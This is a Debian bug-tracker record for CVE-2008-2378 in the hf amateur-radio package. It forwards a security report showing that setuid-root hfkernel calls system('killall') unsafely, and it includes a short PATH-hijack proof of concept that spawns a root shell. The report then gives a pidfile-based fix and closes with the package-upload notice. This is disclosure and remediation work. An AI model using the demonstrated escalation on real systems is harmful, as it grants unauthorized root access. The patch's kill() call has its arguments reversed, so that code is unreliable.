Your message dated Wed, 05 Nov 2008 21:02:48 +0000 with message-id <E1KxpWa-00065A-Dz@ries.debian.org> and subject line Bug#504182: fixed in hf 0.8-8.1 has caused the Debian Bug report #504182, regarding hf: CVE-2008-2378 insecure system call leading to local root to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact owner@bugs.debian.org immediately.) -- 504182: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504182 Debian Bug Tracking System Contact owner@bugs.debian.org with problems
--- Begin Message ---
- To: submit@bugs.debian.org
- Subject: [skx@debian.org: [Secure-testing-team] hf - CVE-2008-2378 - local root exploit]
- From: Nico Golde <nion@debian.org>
- Date: Sat, 1 Nov 2008 14:34:13 +0100
- Message-id: <[🔎] 20081101133413.GD26216@ngolde.de>
Source: hf Severity: grave Tags: security ----- Forwarded message from Steve Kemp <skx@debian.org> ----- From: Steve Kemp <skx@debian.org> To: secure-testing-team@lists.alioth.debian.org User-Agent: Mutt/1.5.17+20080114 (2008-01-14) Cc: hf@packages.debian.org, team@security.debian.org Subject: [Secure-testing-team] hf - CVE-2008-2378 - local root exploit The hf package, Described by Debian as an amateur-radio protocol suite using a soundcard as a modem, is a program that eventually becomes setuid(0), and has a trivial security hole in it. By default the package installs "/usr/bin/hfkernel" as a typical binary, but when first started via the program "hf" the binary is changed to be setuid(root). This is demonstrated: skx@gold:~$ hf Hello I am hf, the startscript for hfterm & hfkernel. I look for them in /usr/bin. If wrong, edit me. hfkernel must run with root rights. The suid bit has to be set. Be aware that this can be a security hole. Please do as root "chmod 4755 /usr/bin/hfkernel". or start this script again as root. If you do start the program as root the permissions are changed: skx@gold:~$ sudo hf Hello I am hf, the startscript for hfterm & hfkernel. I look for them in /usr/bin. If wrong, edit me. hfkernel must run with root rights. The suid bit has to be set. But be aware that this can be a security hole. I will do this now "chmod 4755 /usr/bin/hfkernel". For you, root, I will start only hfkernel for test purposes. ... Now the program is setuid: skx@gold:~$ ls -l /usr/bin/hfkernel -rwsr-xr-x 1 root root 244120 2008-05-07 19:37 /usr/bin/hfkernel Unfortunately the hfkernel program contains a trivial root hole: int main(int argc, char *argv[]) { // snip while ((c = getopt(argc, argv, "a:M:c:klhip:m:nt:s:r:Rf23")) != -1) switch (c) { // snip case 'k': system ("killall hfkernel"); // } Creating ~/bin/killall is sufficient to gain root privileges. skx@gold:~$ echo -e '#!/bin/sh\n/bin/sh' > ~bin/killall skx@gold:~$ chmod 755 ~/bin/killall skx@gold:~$ hfkernel -k sh-3.2# id uid=1000(skx) gid=1000(skx) euid=0(root) This has been given the identifier CVE-2008-2378. Below is the patch that I've come up with to fix this hole, which is a simple pidfile approach. Unless anybody has any comments I'll upload a fix for Etch on Monday/Tuesday. Steve -- --- hf-0.8/hfkernel/main.c 2006-12-22 10:44:23.000000000 +0000 +++ hf-0.8.orig/hfkernel/main.c 2008-11-01 10:33:44.000000000 +0000 @@ -7,19 +7,7 @@ * Copyright (C) 1996 Thomas Sailer (sailer@ife.ee.ethz.ch) * Swiss Federal Institute of Technology (ETH), Electronics Lab * modified by Gnther Montag - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation; either version 2 of the License, or - * (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License - * along with this program; if not, write to the Free Software - * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. + * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. * * */ @@ -78,6 +66,11 @@ #include "alsa.h" #endif /* HAVE_ALSA_ASOUNDLIB_H */ +#ifndef PID_FILE +# define PID_FILE "/var/run/hfkernel.pid" +#endif + + /* --------------------------------------------------------------------- */ /* these variables take hfkernel's options */ @@ -154,6 +147,49 @@ } } +void kill_daemon() +{ + FILE *f; + int pid; + + if (!(f = fopen (PID_FILE, "r"))) + { + errstr( SEV_FATAL, "Failed to read from PID file"); + exit(1); + } + fscanf (f, "%d", &pid); + fclose (f); + + kill( SIGKILL, pid ); + unlink( PID_FILE ); + exit(1); +} + + +int write_pid() +{ + char buf[20]; + int fd; + long pid; + + if ((fd = open (PID_FILE, O_CREAT | O_TRUNC | O_WRONLY, 0600)) == -1) + { + errstr (SEV_FATAL, "cannot open pidfile for writing "); + exit(1); + } + else + { + pid = getpid (); + snprintf (buf, sizeof (buf), "%ld", (long) pid); + if (write (fd, buf, strlen (buf)) != strlen (buf)) + { + errstr (SEV_FATAL, "cannot write to pidfile "); + exit(1); + } + close(fd); + } + return pid; +} /* --------------------------------------------------------------------- */ @@ -529,8 +565,8 @@ break; case 'k': - system ("killall hfkernel"); - + kill_daemon(); + break; case 'l': logging = 1; break; @@ -635,6 +671,7 @@ exit(1); } + if (logging) openlog("hfkernel", LOG_PID, LOG_DAEMON); printf("hfkernel %s starting...\n", PACKAGE_VERSION); @@ -699,6 +736,8 @@ printf("Note: hfkernel is only part of the hf package.\n"); printf("It is controlled by the graphic terminal hfterm. To start them both, use the start script hf. In newer linuxes (kernel 2.6...) we need the syntax\n ÂŽLD_ASDSUME_KERNEL=2.2.5 hftermÂŽ, this is already prepared in the hf script. \n"); + write_pid(); + start_io_thread(); exit(0); } _______________________________________________ Secure-testing-team mailing list Secure-testing-team@lists.alioth.debian.org http://lists.alioth.debian.org/mailman/listinfo/secure-testing-team ----- End forwarded message ----- -- Nico Golde - http://www.ngolde.de - nion@jabber.ccc.de - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted.Attachment: pgpJsTm3v6c9Y.pgp
Description: PGP signature
--- End Message ---
--- Begin Message ---
- To: 504182-close@bugs.debian.org
- Subject: Bug#504182: fixed in hf 0.8-8.1
- From: Nico Golde <nion@debian.org>
- Date: Wed, 05 Nov 2008 21:02:48 +0000
- Message-id: <E1KxpWa-00065A-Dz@ries.debian.org>
Source: hf Source-Version: 0.8-8.1 We believe that the bug you reported is fixed in the latest version of hf, which is due to be installed in the Debian FTP archive: hf_0.8-8.1.diff.gz to pool/main/h/hf/hf_0.8-8.1.diff.gz hf_0.8-8.1.dsc to pool/main/h/hf/hf_0.8-8.1.dsc hf_0.8-8.1_amd64.deb to pool/main/h/hf/hf_0.8-8.1_amd64.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 504182@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Nico Golde <nion@debian.org> (supplier of updated hf package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmaster@debian.org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Format: 1.8 Date: Wed, 05 Nov 2008 21:19:58 +0100 Source: hf Binary: hf Architecture: source amd64 Version: 0.8-8.1 Distribution: unstable Urgency: high Maintainer: Debian Hamradio Maintainers <debian-hams@lists.debian.org> Changed-By: Nico Golde <nion@debian.org> Description: hf - amateur-radio protocol suite using a soundcard as a modem Closes: 504182 Changes: hf (0.8-8.1) unstable; urgency=high . * Non-maintainer upload by the Security Team. * Fix local root security hole that is caused by an insecure call to the system function, thanks Steve Kemp for the patch (CVE-2008-2378; Closes: #504182). Checksums-Sha1: 551137d242d3aa54fdc9d5e4860baf3a6d901ac5 1212 hf_0.8-8.1.dsc 1f0eec520ca27db2fbd2efc8cf6b496ce0ad5197 126128 hf_0.8-8.1.diff.gz abcca04dc39871c43c84825cb9fea847b72d6b4c 681254 hf_0.8-8.1_amd64.deb Checksums-Sha256: 36be9e4b38cd3b9428164d80817b46c10b7e7f4eb5fe9eee30c013559e9b1cec 1212 hf_0.8-8.1.dsc 90728620ec02b70a4236d4f63bbfe86f04ec35c3db09c8f9048ce48f322eb2a8 126128 hf_0.8-8.1.diff.gz abb2ef7f75c5413daa5ad35b77ac056ed8ae135d6e50dac49de8ae3ff2db085e 681254 hf_0.8-8.1_amd64.deb Files: d6dc9fe5aaf6a9c5dd048e155b5a25f4 1212 hamradio optional hf_0.8-8.1.dsc a87b6c21a254bcd533d8e7c4b4f7f996 126128 hamradio optional hf_0.8-8.1.diff.gz 92ed2485529738970c0a35b8be59cdb5 681254 hamradio optional hf_0.8-8.1_amd64.deb -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkkSASQACgkQHYflSXNkfP96nwCghgmz14682qg/7PCprto1wm25 z9YAoI776e+MhOJNjOQ1wEiKajUhHtiE =7zZJ -----END PGP SIGNATURE-----
--- End Message ---